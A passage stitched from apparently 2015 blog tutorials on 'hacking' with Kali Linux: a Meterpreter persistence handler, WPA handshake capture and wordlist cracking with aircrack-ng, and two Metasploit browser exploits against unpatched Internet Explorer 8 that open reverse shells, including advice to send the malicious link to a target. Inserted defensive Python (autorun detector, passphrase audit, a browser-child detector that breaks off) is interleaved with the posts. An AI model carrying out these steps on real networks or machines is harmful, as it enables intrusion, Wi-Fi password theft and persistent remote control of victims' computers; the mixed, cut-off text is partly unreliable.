7) <span style="color: blue;">Set up a handler for the backdoor on the Attacker machine, listening on port 80.</span><br />
<span style="background-color: #fce5cd;">meterpreter > <b>background</b></span><br />
<span style="background-color: #fce5cd;">[*] Backgrounding session 1...</span><br />
<br />
<span style="background-color: #fce5cd;">msf exploit(handler) > <b>use exploit/multi/handler</b></span><br />
<span style="background-color: #fce5cd;">msf exploit(handler) > <b>set payload windows/meterpreter/reverse_tcp</b></span><br />
<span style="background-color: #fce5cd;">payload => windows/meterpreter/reverse_tcp</span><br />
<span style="background-color: #fce5cd;"><br /></span>
<span style="background-color: #fce5cd;">msf exploit(handler) > <b>set LHOST 192.168.1.3</b></span><br />
<span style="background-color: #fce5cd;"><span style="color: red;">LHOST => 192.168.1.3</span></span><br />
<span style="background-color: #fce5cd;"><br /></span>
<span style="background-color: #fce5cd;">msf exploit(handler) > <b>set LPORT 80</b></span><br />
<span style="background-color: #fce5cd;"><span style="color: red;">LPORT => 80</span></span><br />
<span style="background-color: #fce5cd;"><br /></span>
<span style="background-color: #fce5cd;">msf exploit(handler) > <b>exploit</b></span><br />
<span style="background-color: #fce5cd;"><br /></span>
<span style="background-color: #fce5cd;">[*] Started reverse handler on 192.168.1.3:80 </span><br />
<span style="background-color: #fce5cd;">[*] Starting the payload handler...</span><br />
<br />
<br />
8) <span style="color: blue;">Now, whenever the victim machine boots, it will automatically connect to the Attacker machine on port 80.</span><br />
<span style="background-color: #fce5cd;">[*] Sending stage (769536 bytes) to 192.168.1.2</span><br />
<span style="background-color: #fce5cd;">[*] <span style="color: red;">Meterpreter session 2 opened (192.168.1.3:80 -> 192.168.1.2:1051)</span> at 2015-06-25 07:19:35 +0530</span><br />
<span style="background-color: #fce5cd;"><br /></span>
<span style="background-color: #fce5cd;">meterpreter > </span><br />
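The persistence run in step 6 left a clear artefact on the victim: a Run-key value with a random name pointing at a .vbs under %TEMP%, which is what step 8 relies on at every boot. The following is an added example, not code from the original post or from Metasploit, that a defender would run over a reg query listing of that key; the listing is constructed, and the command stored for the persistence entry is assumed to be the .vbs path printed above.<br />

```python
"""Flag suspicious autoruns in the HKLM Run key, like the one installed above.

Added example, not part of the original post: it parses a constructed
`reg query` listing of the Run key and scores each value with three
heuristics (script file or script interpreter as the target, target under
a temp or user-writable directory, random-looking value name). The command
stored for the persistence entry is assumed to be the .vbs path shown above.
"""
import re
from dataclasses import dataclass, field

RUN_KEY = r"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run"

# Constructed sample in `reg query` output format. The last value mirrors the
# autorun name and %TEMP% script path from the persistence output above.
SAMPLE_REG_QUERY = r"""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
    VMware Tools    REG_SZ    "C:\Program Files\VMware\VMware Tools\VMwareTray.exe"
    SunJavaUpdateSched    REG_SZ    "C:\Program Files\Java\jre6\bin\jusched.exe"
    YHxeQVYtYjmIYu    REG_SZ    C:\DOCUME~1\shabbir\LOCALS~1\Temp\RXdYyZmSEBJVd.vbs
"""

# `reg query` separates name, type and data with runs of spaces.
ENTRY_RE = re.compile(r"^\s+(?P<name>.+?)\s{2,}(?P<type>REG_\w+)\s{2,}(?P<data>.*)$")
SCRIPT_RE = re.compile(r"\.(vbs|vbe|js|jse|wsf|wsh|hta|ps1|bat|cmd)\b", re.I)
INTERP_RE = re.compile(r"\b(wscript|cscript|mshta|powershell|cmd)(\.exe)?\b", re.I)
TEMP_RE = re.compile(r"(\\temp\\|locals~1|%temp%|\\appdata\\local\\|\\downloads\\)", re.I)


@dataclass
class Autorun:
    name: str
    reg_type: str
    command: str
    reasons: list = field(default_factory=list)

    @property
    def suspicious(self) -> bool:
        return bool(self.reasons)


def parse_reg_query(text: str) -> list:
    """Turn `reg query` output into Autorun entries (name, type, data)."""
    entries = []
    for line in text.splitlines():
        m = ENTRY_RE.match(line)
        if m:
            entries.append(Autorun(m["name"], m["type"], m["data"].strip()))
    return entries


def random_looking(name: str) -> bool:
    """Heuristic: long, letters only, and far fewer vowels than real words.

    Generated names like YHxeQVYtYjmIYu sit well below the ~0.35 vowel ratio
    of English product names; short or digit-bearing names are not judged.
    """
    letters = name.replace(" ", "")
    if len(letters) < 8 or not letters.isalpha():
        return False
    vowels = sum(ch in "aeiouAEIOU" for ch in letters)
    return vowels / len(letters) < 0.25


def assess(entry: Autorun) -> Autorun:
    """Attach a reason for every heuristic the entry trips."""
    if SCRIPT_RE.search(entry.command):
        entry.reasons.append("autorun target is a script file")
    if INTERP_RE.search(entry.command):
        entry.reasons.append("autorun invokes a script interpreter")
    if TEMP_RE.search(entry.command):
        entry.reasons.append("target lives in a temp or user-writable directory")
    if random_looking(entry.name):
        entry.reasons.append("value name looks randomly generated")
    return entry


def find_suspicious_autoruns(text: str) -> list:
    return [e for e in map(assess, parse_reg_query(text)) if e.suspicious]


if __name__ == "__main__":
    for e in find_suspicious_autoruns(SAMPLE_REG_QUERY):
        print(f"[!] {RUN_KEY}\\{e.name} -> {e.command}")
        for reason in e.reasons:
            print(f"      - {reason}")
```

The listing covers only the HKLM Run key; the -U and -S options in the help text above persist elsewhere (a per-user autorun and a service), so an inventory tool such as Sysinternals Autoruns is the practical way to cover every location.<br />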
<br />
<br /></div>
Shabbir Rangwalahttp://www.blogger.com/profile/06038985133173388069noreply@blogger.com7tag:blogger.com,1999:blog-1164086323266606043.post-29777151001692088792015-06-22T18:35:00.000+05:302015-06-24T11:24:21.953+05:30Hack WPA/WPA2 Wi-Fi with aircrack-ng in Kali Linux.<div dir="ltr" style="text-align: left;" trbidi="on">
<br />
In this tutorial, we use 'aircrack-ng' in Kali Linux to crack the password of a WPA Wi-Fi network. <br />
<br />
Perform the following steps on the Kali Linux machine.<br />
<br />
1) Disconnect from all wireless networks.<br />
<br />
2) Verify that your wireless card supports monitor mode.<br />
<span style="background-color: #fce5cd;"><span style="color: black;">root@kali:~# <b>airmon-ng</b></span></span><br />
<span style="background-color: #fce5cd;"><span style="color: black;"><br /></span></span>
<span style="background-color: #fce5cd;"><span style="color: black;">Interface Chipset Driver</span></span><br />
<span style="background-color: #fce5cd;"><span style="color: black;"><br /></span></span>
<span style="background-color: #fce5cd;"><span style="color: black;">wlan0 Atheros AR9285 ath9k - [phy0]</span></span><br />
<br />
If your wireless card is not listed above, then it does not support monitor mode and you cannot continue. <br />
<br />
3) Enable Monitor mode<br />
<span style="background-color: #fce5cd;">root@kali:~#<b> airmon-ng start wlan0</b></span><br />
<span style="background-color: #fce5cd;">Found 2 processes that could cause trouble.</span><br />
<span style="background-color: #fce5cd;">If airodump-ng, aireplay-ng or airtun-ng stops working after</span><br />
<span style="background-color: #fce5cd;">a short period of time, you may want to kill (some of) them!</span><br />
<span style="background-color: #fce5cd;">-e</span><br />
<span style="background-color: #fce5cd;">PID Name</span><br />
<span style="background-color: #fce5cd;">2550 NetworkManager</span><br />
<span style="background-color: #fce5cd;">2658 wpa_supplicant</span><br />
<span style="background-color: #fce5cd;"><br /></span>
<span style="background-color: #fce5cd;"><br /></span>
<span style="background-color: #fce5cd;">Interface Chipset Driver</span><br />
<span style="background-color: #fce5cd;"><br /></span>
<span style="background-color: #fce5cd;">wlan0 Atheros AR9285 ath9k - [phy0]</span><br />
<span style="background-color: #fce5cd;"> <span style="color: red;">(monitor mode enabled on mon0)</span></span><br />
<br />
Note the name of the new monitor interface, <span style="color: red;">mon0</span><br />
<br />
4) Bring the wireless interface down so it stops connecting to the Internet and the card can be used in monitor mode instead.<br />
<span style="background-color: #fce5cd;">root@kali:~#<b> ifconfig wlan0 down</b></span><br />
<br />
5) List all the wireless networks in range.<br />
<span style="background-color: #fce5cd;">root@kali:~# <b>airodump-ng mon0</b></span><br />
<span style="background-color: #fce5cd;"> BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID</span><br />
<span style="background-color: #fce5cd;"> </span><br />
<span style="background-color: #fce5cd;"> <span style="color: red;">54:B8:0A:89:76:4E -33 16 10 4 1 54e WPA TKIP PSK SHABBIR </span> </span><br />
<span style="background-color: #fce5cd;"> 94:D7:23:0C:09:20 -77 20 51 0 11 54e WPA CCMP PSK MTNL </span><br />
<span style="background-color: #fce5cd;"> 9C:D6:43:CC:04:B8 -80 11 0 0 2 54e. WPA2 CCMP PSK dlink </span><br />
<span style="background-color: #fce5cd;"> 10:7B:EF:A6:26:80 -80 3 0 0 11 54e WPA2 CCMP PSK TATA </span> <br />
<br />
Locate your network, press <b>Ctrl+C</b> to stop the process, and note down the <span style="color: red;">BSSID</span> and <span style="color: red;">CH (channel)</span>. <br />
<br />
<br />
6) Monitor only the target network and wait for a device to connect to the network and then capture the four-way handshake.<br />
<span style="background-color: #fce5cd;">root@kali:~# <b>airodump-ng -c 1 --bssid 54:B8:0A:89:76:4E -w Desktop/wpa mon0</b></span><br />
<br />
Where,<br />
<span style="color: red;">-c 1</span> -> channel of network is 1 (as seen in the previous output)<br />
<span style="color: red;">--bssid 54:B8:0A:89:76:4E</span> -> BSSID copied from the previous output (The MAC address of the Access Point).<br />
<span style="color: red;">-w Desktop/wpa</span> -> file name where the handshake will be saved.<br />
<span style="color: red;">mon0</span> -> the monitor interface<br />
<br />
<br />
7) What we are really doing now is waiting for a device to connect to the network, so that we can capture the four-way handshake which we need in order to crack the password. Also, four files will show up on your desktop. This is where the handshake will be saved. <br />
<br />
When a device connects to the network, the following message appears on the airodump screen, <span style="color: red;">"WPA handshake: 54:B8:0A:89:76:4E"</span>, as shown below:<br />
<br />
<span style="background-color: #fce5cd;"> CH 1 ][ Elapsed: 32 s ][ 2015-06-22 09:56 ][ <span style="color: red;">WPA handshake: 54:B8:0A:89:76:4E </span></span><br />
<span style="background-color: #fce5cd;"> </span><br />
<span style="background-color: #fce5cd;"> BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID</span><br />
<span style="background-color: #fce5cd;"> </span><br />
<span style="background-color: #fce5cd;"> 54:B8:0A:89:76:4E -29 1 314 6 0 1 54e WPA TKIP PSK SHABBIR </span><br />
<span style="background-color: #fce5cd;"> </span><br />
<span style="background-color: #fce5cd;"> BSSID STATION PWR Rate Lost Frames Probe </span><br />
<span style="background-color: #fce5cd;"> </span><br />
<span style="background-color: #fce5cd;"> 54:B8:0A:89:76:4E 0C:EE:E6:C0:37:43 -26 1e-54 0 9 </span><br />
<br />
<br />The handshake has been captured. Press <b>Ctrl+C</b> on the airodump terminal to stop monitoring the network. <br />
<br />
8) Launch the process of cracking the password. However, it will only crack it if the password happens to be in the wordlist that you have selected.<br />
<span style="background-color: #fce5cd;"><b>root@kali:~# aircrack-ng -a2 -b 54:B8:0A:89:76:4E -w /usr/share/wordlists/fern-wifi/common.txt Desktop/*.cap</b></span><br />
<br />
<span style="background-color: #fce5cd;">Opening Desktop/wpa-04.cap</span><br />
<span style="background-color: #fce5cd;">Reading packets, please wait...</span><br />
<span style="background-color: #fce5cd;"><br /></span>
<span style="background-color: #fce5cd;"> Aircrack-ng 1.2 beta3</span><br />
<span style="background-color: #fce5cd;"><br /></span>
<span style="background-color: #fce5cd;"><br /></span>
<span style="background-color: #fce5cd;"> [00:00:00] 4 keys tested (254.57 k/s)</span><br />
<span style="background-color: #fce5cd;"><br /></span>
<span style="background-color: #fce5cd;"><br /></span>
<span style="background-color: #fce5cd;"> KEY FOUND! [ <span style="color: red;">goodadmin</span> ]</span><br />
<span style="background-color: #fce5cd;"><br /></span>
<span style="background-color: #fce5cd;"><br /></span>
<span style="background-color: #fce5cd;"> Master Key : 9A CD 12 5D 29 22 11 C7 6A 3D 75 0D 9D A7 76 C1 </span><br />
<span style="background-color: #fce5cd;"> F1 2A 9B 9A 57 DD A9 EA 11 26 B0 EB 40 09 1E EB </span><br />
<span style="background-color: #fce5cd;"><br /></span>
<span style="background-color: #fce5cd;"> Transient Key : 5A 15 F5 AD 5A F6 1F 00 78 F5 5F 0F 87 46 8C 81 </span><br />
<span style="background-color: #fce5cd;"> DA 1F B4 8B 7C B2 C9 24 4B 63 6D EF 64 88 30 67 </span><br />
<span style="background-color: #fce5cd;"> 66 E4 5E 30 5E 4C C1 E1 F5 47 8A 7F AE F0 A6 FB </span><br />
<span style="background-color: #fce5cd;"> BF 7B 9E A6 AB ED B6 1B 43 15 43 D1 EF 6E C2 49 </span><br />
<span style="background-color: #fce5cd;"><br /></span>
<span style="background-color: #fce5cd;"> EAPOL HMAC : 79 56 57 C1 85 7D D8 A4 CD 89 B3 34 A5 36 D0 77 </span><br />
<span style="background-color: #fce5cd;"><br /></span>
<br />
Where,<br />
<span style="color: red;">-a</span> is the attack mode used on the captured handshake (2 = WPA-PSK)<br />
<span style="color: red;">-b</span> is the BSSID of the target access point<br />
<span style="color: red;">-w</span> is the path to the wordlist<br />
<span style="color: red;">Desktop/*.cap</span> is the path to the .cap file containing the captured handshake.<br />
<br />
<br />
9) After finishing, disable mon0 and enable wlan0 so that you can connect to the Internet again.<br />
<br />
<span style="background-color: #fce5cd;">root@kali:~# <b>ifconfig mon0 down</b></span><br />
<span style="background-color: #fce5cd;">root@kali:~# <b>ifconfig wlan0 up</b></span><br />
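Added here as an example that is not part of the original post: the "Master Key" aircrack-ng prints above is the WPA Pairwise Master Key, derived from the passphrase and the SSID with PBKDF2-HMAC-SHA1 (4096 iterations, 32 bytes, as IEEE 802.11i specifies). The Python below reproduces that derivation so the defender's lesson of step 8 is concrete: once a four-way handshake has been captured, the only protection left is whether the passphrase can be guessed, and the SSID salt only stops precomputed tables from being reused across networks. The `audit_passphrase` policy thresholds and the mini wordlist are assumptions constructed for this example.

```python
import hashlib
import string

# PBKDF2 parameters fixed by IEEE 802.11i for WPA/WPA2-Personal (PSK mode)
PMK_ITERATIONS = 4096
PMK_LENGTH = 32  # bytes; this is the value aircrack-ng prints as "Master Key"

# Constructed stand-in for a wordlist such as fern-wifi/common.txt
SAMPLE_WORDLIST = ["123456\n", "password\n", "goodadmin\n", "letmein\n"]


def derive_pmk(passphrase, ssid):
    """PMK = PBKDF2-HMAC-SHA1(passphrase, ssid, 4096, 32) per 802.11i.
    The SSID is the salt, so a precomputed table only works for one SSID,
    and the 4096 iterations are what bound the offline guessing rate
    (the k/s figure aircrack-ng reports)."""
    if not 8 <= len(passphrase) <= 63:
        raise ValueError("WPA-PSK passphrases must be 8 to 63 characters")
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode("utf-8"),
                               ssid.encode("utf-8"), PMK_ITERATIONS, PMK_LENGTH)


def audit_passphrase(passphrase, ssid, wordlist, min_length=12):
    """Return a list of weaknesses; an empty list means no example-policy
    check fired. The thresholds are an assumed policy, not a standard."""
    findings = []
    if passphrase in {w.strip() for w in wordlist}:
        findings.append("present in wordlist: recoverable offline from one captured handshake")
    if len(passphrase) < min_length:
        findings.append(f"shorter than {min_length} characters")
    classes = (string.ascii_lowercase, string.ascii_uppercase,
               string.digits, string.punctuation)
    if sum(any(c in cls for c in passphrase) for cls in classes) < 3:
        findings.append("uses fewer than three character classes")
    if ssid.lower() in passphrase.lower():
        findings.append("contains the SSID")
    return findings


if __name__ == "__main__":
    pmk = derive_pmk("goodadmin", "SHABBIR")
    print("PMK:", pmk.hex())
    for weakness in audit_passphrase("goodadmin", "SHABBIR", SAMPLE_WORDLIST):
        print("weak:", weakness)
```

Run against your own SSID and passphrase; any finding from the wordlist check means the network falls to exactly the step shown above, and the only fix is a new passphrase (or moving to WPA2/WPA3-Enterprise, where no shared passphrase exists to capture).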
<br />
<br />
<br />
<br />
<br />
</div>
Hack Windows 7 by using Kali Linux (Shabbir Rangwala, published 2015-06-21)<div dir="ltr" style="text-align: left;" trbidi="on">
<br />
In this tutorial, we will exploit the "Internet Explorer CSS recursive call memory corruption" vulnerability in <span style="color: red;">Internet Explorer 8</span> on <span style="color: red;">Windows 7 Service Pack 1 (unpatched)</span> using Metasploit in Kali Linux and get a remote shell on the Windows 7 machine.<br />
<br />
We have the following configuration:<br />
Windows 7 IP Address: <span style="color: red;">192.168.122.10 </span><br />
Kali Linux IP Address: <span style="color: red;">192.168.122.115 </span><br />
<br />
Perform the following steps on the Kali Linux Machine<br />
<br />
1) <span style="color: blue;">Start the services.</span><br />
root@kali:~# <b>service postgresql start</b><br />
[ ok ] Starting PostgreSQL 9.1 database server: main.<br />
<br />
root@kali:~# <b>service metasploit start</b><br />
[ ok ] Starting Metasploit rpc server: prosvc.<br />
[ ok ] Starting Metasploit web server: thin.<br />
[ ok ] Starting Metasploit worker: worker.<br />
<br />
<br />
2) <span style="color: blue;">Start metasploit console. </span><br />
root@kali:~# <b>msfconsole</b><br />
msf ><br />
<br />
3) <span style="color: blue;">Select exploit. </span><br />
msf > <b>use exploit/windows/browser/ms11_003_ie_css_import </b><br />
<br />
4) <span style="color: blue;">Select payload.<b> </b> </span><br />
msf exploit(ms11_003_ie_css_import) > <b>set payload windows/meterpreter/reverse_tcp</b><br />
payload => windows/meterpreter/reverse_tcp<br />
<br />
<br />
5) <span style="color: blue;">View options. </span><br />
msf exploit(ms11_003_ie_css_import) > <b>show options</b><br />
<br />
Module options (exploit/windows/browser/ms11_003_ie_css_import):<br />
<br />
Name Current Setting Required Description<br />
---- --------------- -------- -----------<br />
OBFUSCATE true no Enable JavaScript obfuscation<br />
<span style="color: red;"> SRVHOST 0.0.0.0 yes The local host to listen on. This must be an address on the local machine or 0.0.0.0<br /> SRVPORT 8080 yes The local port to listen on.</span><br />
SSL false no Negotiate SSL for incoming connections<br />
SSLCert no Path to a custom SSL certificate (default is randomly generated)<br />
<span style="color: red;"> URIPATH no The URI to use for this exploit (default is random)</span><br />
<br />
Payload options (windows/meterpreter/reverse_tcp):<br />
<br />
Name Current Setting Required Description<br />
---- --------------- -------- -----------<br />
EXITFUNC process yes Exit technique (accepted: seh, thread, process, none)<br />
<span style="color: red;">LHOST yes The listen address<br /> LPORT 4444 yes The listen port</span><br />
Exploit target:<br />
<br />
Id Name<br />
-- ----<br />
0 Automatic<br />
<br />
<br />
6) <span style="color: blue;">Set options</span><br />
msf exploit(ms11_003_ie_css_import) > <b>set URIPATH /</b><br />
URIPATH => /<br />
msf exploit(ms11_003_ie_css_import) > <b>set LHOST 192.168.122.115</b><br />
LHOST => 192.168.122.115<br />
<br />
7) <span style="color: blue;">Execute the exploit. </span><br />
msf exploit(ms11_003_ie_css_import) > <b>exploit</b><br />
[*] Exploit running as background job.<br />
<br />
[*] <span style="color: red;">Started reverse handler on 192.168.122.115:4444 </span><br />
msf exploit(ms11_003_ie_css_import) > [*] Using URL: http://0.0.0.0:8080/<br />
[*] Local IP: <i><span style="color: red;">http://192.168.122.115:8080/</span></i><br />
[*] Server started.<br />
<br />
<br />
8) <span style="color: blue;">User clicks on the malicious URL.</span> As we can see, a link has been generated as a result of the exploit command. This is the malicious link <i><span style="color: red;">http://192.168.122.115:8080/ </span></i><span style="color: red;"><span style="color: black;">that we will have to send to our target, so that it can exploit their browser.</span></span><br />
<br />
When the user clicks on the malicious link, the browser will try to load the page, but nothing will be displayed. You will, however, get a remote shell in your msfconsole, as shown below.<br />
<br />
[*] 192.168.122.10 ms11_003_ie_css_import - Received request for "/"<br />
[*] 192.168.122.10 ms11_003_ie_css_import - Sending redirect<br />
[*] 192.168.122.10 ms11_003_ie_css_import - Received request for "/iPKMV.html"<br />
[*] 192.168.122.10 ms11_003_ie_css_import - Sending HTML<br />
[*] 192.168.122.10 ms11_003_ie_css_import - Received request for "/generic-1434889455.dll"<br />
[*] 192.168.122.10 ms11_003_ie_css_import - Sending .NET DLL<br />
[*] 192.168.122.10 ms11_003_ie_css_import - Received request for "/favicon.ico"<br />
[*] 192.168.122.10 ms11_003_ie_css_import - Sending CSS<br />
[*] 192.168.122.10 ms11_003_ie_css_import - Received request for "/\xEE\x80\xA0\xE1\x81\x9A\xEE\x80\xA0\xE1\x81\x9A\xEE\x80\xA0\xE1\x81\x9A\xEE\x80\xA0\xE1\x81\x9A"<br />
[*] 192.168.122.10 ms11_003_ie_css_import - Sending CSS<br />
[*] Sending stage (770048 bytes) to 192.168.122.10<br />
<span style="color: red;">[*] Session ID 1 <span style="color: black;">(192.168.122.115:4444 -> 192.168.122.10:49219) processing InitialAutoRunScript 'migrate -f'</span></span><br />
[*] Current server process: <span style="color: red;">iexplore.exe</span> (2744)<br />
[*] Spawning <span style="color: red;">notepad.exe </span>process to migrate to<br />
[+<span style="color: red;"><span style="color: black;">] Migrating to</span> 3376</span><br />
[*] 192.168.122.10 ms11_003_ie_css_import - Received request for "/generic-1434889455.dll"<br />
[*] 192.168.122.10 ms11_003_ie_css_import - Sending .NET DLL<br />
[*] Sending stage (770048 bytes) to 192.168.122.10<br />
[*] 192.168.122.10 ms11_003_ie_css_import - Received request for "/favicon.ico"<br />
[*] 192.168.122.10 ms11_003_ie_css_import - Sending CSS<br />
[+] Successfully migrated to process <br />
<span style="color: red;">[*] Session ID 2 <span style="color: black;">(192.168.122.115:4444 -> 192.168.122.10:49221) processing InitialAutoRunScript 'migrate -f'</span></span><br />
[*] Current server process: <span style="color: red;">iexplore.exe</span> (3404)<br />
[*] Spawning <span style="color: red;">notepad.exe</span> process to migrate to<br />
[+] Migrating to 3532<br />
[*] 192.168.122.10 ms11_003_ie_css_import - Received request for "/generic-1434889455.dll"<br />
[*] 192.168.122.10 ms11_003_ie_css_import - Sending .NET DLL<br />
[*] Sending stage (770048 bytes) to 192.168.122.10<br />
[+] Successfully migrated to process <br />
[*] <span style="color: red;">Session ID 3</span> (192.168.122.115:4444 -> 192.168.122.10:49224) processing InitialAutoRunScript 'migrate -f'<br />
[*] Current server process: <span style="color: red;">iexplore.exe</span> (3664)<br />
[*] Spawning <span style="color: red;">notepad.exe </span>process to migrate to<br />
[+] Migrating to 3808<br />
[*] 192.168.122.10 ms11_003_ie_css_import - Received request for "/generic-1434889455.dll"<br />
[*] 192.168.122.10 ms11_003_ie_css_import - Sending .NET DLL<br />
[*] Sending stage (770048 bytes) to 192.168.122.10<br />
[+] Successfully migrated to process <br />
[*] <span style="color: red;">Session ID 4 </span>(192.168.122.115:4444 -> 192.168.122.10:49226) processing InitialAutoRunScript 'migrate -f'<br />
[*] Current server process: <span style="color: red;">iexplore.exe</span> (3848)<br />
[*] Spawning <span style="color: red;">notepad.exe</span> process to migrate to<br />
[+] Migrating to 3984<br />
[+] Successfully migrated to process <br />
<br />
As we can see above, the InitialAutoRunScript runs a <b>migrate -f</b> command, which migrates the payload from iexplore.exe into a newly spawned notepad.exe. This step is essential for persistent connectivity: even if the user closes the browser, the connection stays alive because the payload now lives in another process.<br />
<br />
9) <span style="color: blue;">View the sessions.</span><br />
msf exploit(ms11_003_ie_css_import) > <b>sessions -i</b><br />
<br />
Active sessions<br />
===============<br />
<br />
Id Type Information Connection<br />
-- ---- ----------- ----------<br />
1 meterpreter x86/win32 shabbir-PC\ali @ SHABBIR-PC 192.168.122.115:4444 -> 192.168.122.10:49219 (192.168.122.10)<br />
2 meterpreter x86/win32 shabbir-PC\ali @ SHABBIR-PC 192.168.122.115:4444 -> 192.168.122.10:49221 (192.168.122.10)<br />
3 meterpreter x86/win32 shabbir-PC\ali @ SHABBIR-PC 192.168.122.115:4444 -> 192.168.122.10:49224 (192.168.122.10)<br />
4 meterpreter x86/win32 shabbir-PC\ali @ SHABBIR-PC 192.168.122.115:4444 -> 192.168.122.10:49226 (192.168.122.10)<br />
<br />
<br />
10) <span style="color: blue;">Connect to the remote machine.</span><br />
msf exploit(ms11_003_ie_css_import) > <b>sessions -i 1</b><br />
[*] Starting interaction with 1...<br />
<br />
meterpreter > <b>sysinfo</b><br />
Computer : SHABBIR-PC<br />
OS : Windows 7 (Build 7601, Service Pack 1).<br />
Architecture : x86<br />
System Language : en_US<br />
Meterpreter : x86/win32<br />
<br />
meterpreter ><b> getuid</b><br />
Server username: shabbir-PC\ali<br />
<br />
meterpreter > <b>shell</b><br />
Process 2704 created.<br />
Channel 1 created.<br />
Microsoft Windows [Version 6.1.7601]<br />
Copyright (c) 2009 Microsoft Corporation. All rights reserved.<br />
<br />
C:\Users\ali\Desktop></div>
Hack Internet Explorer 8 in Windows 7 using Kali Linux (Shabbir Rangwala, published 2015-06-20)<div dir="ltr" style="text-align: left;" trbidi="on">
<br />
In this tutorial, we will hack <span style="color: red;">Internet Explorer 8</span> in <span style="color: red;">Windows 7 Service Pack 1 (unpatched)</span> using Metasploit in Kali Linux and get a remote shell on the Windows 7 machine.<br />
<br />
This exploit works when the <b>Initialize and script ActiveX controls not marked as safe</b> setting is <b>enabled</b> in Internet Explorer.<br />
<br />
To enable the above setting, start Internet Explorer and click on <b>Tools</b> -> <b>Internet Options</b> -> <b>Security</b> -> <b>Custom</b> <b>Level</b> -> <b>Initialize and script ActiveX controls not marked as safe </b>-> <b>Enable</b>.<br />
<br />
We have the following configuration: <br />
Windows 7 IP Address: <span style="color: red;">192.168.122.10 </span><br />
Kali Linux IP Address: <span style="color: red;">192.168.122.115 </span><br />
<br />
Perform the following steps on the Kali Linux Machine<br />
<br />
1) <span style="color: blue;">Start the services.</span><br />
root@kali:~# <b>service postgresql start</b><br />
[ ok ] Starting PostgreSQL 9.1 database server: main.<br />
<br />
root@kali:~# <b>service metasploit start</b><br />
[ ok ] Starting Metasploit rpc server: prosvc.<br />
[ ok ] Starting Metasploit web server: thin.<br />
[ ok ] Starting Metasploit worker: worker.<br />
<br />
<br />
2) <span style="color: blue;">Start metasploit console. </span><br />
root@kali:~# <b>msfconsole</b><br />
msf ><br />
<br />
3) <span style="color: blue;">Select exploit. </span><br />
msf > <b>use exploit/windows/browser/ie_unsafe_scripting</b><br />
<br />
4) <span style="color: blue;">Select payload.<b> </b> </span><br />
msf exploit(ie_unsafe_scripting) > <b>set payload windows/meterpreter/reverse_tcp</b><br />
payload => windows/meterpreter/reverse_tcp<br />
<br />
5) <span style="color: blue;">View options. </span><br />
msf exploit(ie_unsafe_scripting) > <b>show options</b><br />
<br />
Module options (exploit/windows/browser/ie_unsafe_scripting):<br />
<br />
Name Current Setting Required Description<br />
---- --------------- -------- -----------<br />
<span style="color: red;"> SRVHOST 0.0.0.0 yes The local host to listen on. This must be an address on the local machine or 0.0.0.0</span><br />
<span style="color: red;"> SRVPORT 8080 yes The local port to listen on.</span><br />
SSL false no Negotiate SSL for incoming connections<br />
SSLCert no Path to a custom SSL certificate (default is randomly generated)<br />
TECHNIQUE VBS yes Delivery technique (VBS Exe Drop or PSH CMD) (accepted: VBS, Powershell)<br />
URIPATH no The URI to use for this exploit (default is random)<br />
<br />
<br />
Payload options (windows/meterpreter/reverse_tcp):<br />
<br />
Name Current Setting Required Description<br />
---- --------------- -------- -----------<br />
EXITFUNC process yes Exit technique (accepted: seh, thread, process, none)<br />
<span style="color: red;"> LHOST yes The listen address</span><br />
<span style="color: red;"> LPORT 4444 yes The listen port</span><br />
<br />
<br />
Exploit target:<br />
<br />
Id Name<br />
-- ----<br />
0 Windows x86/x64<br />
<br />
6) <span style="color: blue;">Set options</span><br />
msf exploit(ie_unsafe_scripting) > <b>set LHOST 192.168.122.115</b><br />
LHOST => 192.168.122.115<br />
<br />
7) <span style="color: blue;">Execute the exploit. </span><br />
msf exploit(ie_unsafe_scripting) > <b>exploit</b><br />
[*] Exploit running as background job.<br />
<br />
[*] Started reverse handler on 192.168.122.115:4444 <br />
msf exploit(ie_unsafe_scripting) > [*] Using URL: http://0.0.0.0:8080/bHN7e4<br />
[*] Local IP: <i><span style="color: red;">http://192.168.122.115:8080/bHN7e4</span></i><br />
[*] Server started.<br />
<br />
<br />
8) <span style="color: blue;">User clicks on the malicious URL.</span> As we can see, a link has been generated as a result of the exploit command. This is the malicious link (<i><span style="color: red;">http://192.168.122.115:8080/bHN7e4) </span></i><span style="color: red;"><span style="color: black;">that we will have to send to our target, so that it can exploit their browser.</span></span><br />
<br />
When the user clicks on the malicious link, the browser will try to load the page, but nothing will be displayed. You will, however, get a remote shell in your msfconsole, as shown below.<br />
<br />
msf exploit(ie_unsafe_scripting) > [*] 192.168.122.10 ie_unsafe_scripting - Request received for /bHN7e4<br />
[*] 192.168.122.10 ie_unsafe_scripting - Sending exploit html/javascript<br />
[*] Sending stage (770048 bytes) to 192.168.122.10<br />
[*] Meterpreter session 1 opened (192.168.122.115:4444 -> 192.168.122.10:49166) at 2015-06-20 17:13:43 +0530<br />
<br />
msf exploit(ie_unsafe_scripting) > <b>sessions -i 1</b><br />
[*] Starting interaction with 1...<br />
<br />
meterpreter > <b>shell</b><br />
Process 3680 created.<br />
Channel 1 created.<br />
Microsoft Windows [Version 6.1.7601]<br />
Copyright (c) 2009 Microsoft Corporation. All rights reserved.<br />
<br />
C:\Users\shabbir\Desktop><br />
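In both Internet Explorer posts above, the payload ends up in a process that iexplore.exe started: the first post's InitialAutoRunScript migrates into a spawned notepad.exe, and in this post the delivery technique runs from the browser's own scripting context. Added here as an example that is not part of either post: detection logic in Python over constructed Sysmon-style events, flagging any process a browser spawned, or a descendant of one, that then opens an outbound connection. The event shape, the browser and child lists, and the sample events are assumptions of this example; PIDs 2744 and 3376 echo the first post's output.

```python
# Image names are compared case-insensitively
BROWSERS = {"iexplore.exe", "firefox.exe", "chrome.exe", "msedge.exe"}
# Children a browser has no legitimate reason to spawn (assumed list for this example)
UNEXPECTED_CHILDREN = {"notepad.exe", "cmd.exe", "powershell.exe", "wscript.exe",
                       "cscript.exe", "rundll32.exe", "regsvr32.exe", "mshta.exe"}

# Constructed events in a Sysmon-like shape (not real telemetry):
# type 1 = process create, type 3 = network connection.  PIDs 2744 and 3376
# mirror the iexplore.exe -> notepad.exe migration shown in the first post.
SAMPLE_EVENTS = [
    {"type": 1, "pid": 2744, "image": "iexplore.exe", "ppid": 1200, "parent_image": "explorer.exe"},
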